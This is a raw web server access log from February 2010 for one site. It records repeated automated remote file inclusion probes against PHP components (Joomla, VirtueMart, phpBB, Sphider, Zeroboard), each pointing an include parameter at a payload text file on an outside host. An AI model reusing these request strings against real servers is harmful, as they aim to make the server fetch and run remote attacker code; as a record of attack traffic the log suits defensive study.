220.73.144.196 - - [07/Feb/2010:07:09:19 -0800] "GET /logs/access_100119.log///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:09:22 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:09:22 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:09:23 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:09:40 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:07:10:13 -0800] "GET /logs//modifyform.html?code=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [07/Feb/2010:07:10:14 -0800] "GET /modifyform.html?code=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:10:15 -0800] "GET /logs/access_100202.log/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:10:15 -0800] "GET /logs/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:10:16 -0800] "GET /?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:10:20 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:10:23 -0800] "GET /sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:10:23 -0800] "GET /logs/sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:10:23 -0800] "GET /logs/access_100125.log%20%20/sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.88.25.28 - - [07/Feb/2010:07:10:24 -0800] "GET /logs/access_091204.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:10:41 -0800] "GET /includes/functions.php?phpbb_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:10:41 -0800] "GET /logs/access_091231.log/includes/functions.php?phpbb_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:10:41 -0800] "GET /logs/includes/functions.php?phpbb_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:11:05 -0800] "GET /logs/access_100202.log/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:11:05 -0800] "GET /logs/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:11:05 -0800] "GET /?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:11:15 -0800] "GET /logs/access_100130.log/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:11:16 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:11:16 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:11:16 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:11:31 -0800] "GET /logs/access_100109.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:07:11:33 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:44 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:44 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:44 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:11:53 -0800] "GET /logs/sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:11:53 -0800] "GET /sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Feb/2010:07:11:53 -0800] "GET /logs/access_100125.log%20%20/sphider/search.php?include_dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:59 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:59 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:11:59 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:12:04 -0800] "GET /logs/access_100130.log/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:12:50 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:12:52 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:13:13 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:13:13 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:13:13 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:13:22 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:14:04 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:14:04 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:14:04 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:14:22 -0800] "GET /logs/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:14:22 -0800] "GET /logs/access_100202.log%20%20/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:14:23 -0800] "GET /?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:14:31 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:15:06 -0800] "GET /logs/access_100202.log%20%20/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:15:06 -0800] "GET /logs/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:15:07 -0800] "GET /?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:15:50 -0800] "GET /logs/access_091231.log%20/includes/functions.php?phpbb_root_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:15:55 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:15:55 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:15:55 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:16:46 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:16:46 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:16:46 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:00 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:00 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:00 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:14 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:14 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:14 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:18:27 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:18:27 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:18:27 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:18:27 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:58 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:58 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:18:58 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:19:06 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:19:46 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:20:08 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:20:24 -0800] "GET /logs/access_100130.log%20%20/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:07:21:07 -0800] "GET /logs/access_100130.log%20%20/?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:07:21:27 -0800] "GET /logs/access_100110.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:07:21:27 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:21:28 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:07:21:28 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:42 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:42 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:42 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:46 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:46 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:21:46 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:40 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:40 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:40 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [07/Feb/2010:07:22:50 -0800] "GET /logs/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [07/Feb/2010:07:22:50 -0800] "GET ////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [07/Feb/2010:07:22:50 -0800] "GET /logs/access_100111.log/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:53 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:53 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:22:53 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [07/Feb/2010:07:23:06 -0800] "GET /logs/access_100109.log/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:23 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:23 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:23 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:26 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:26 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:26 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:33 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:33 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:33 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:23:36 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:39 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:40 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:40 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:43 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:43 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
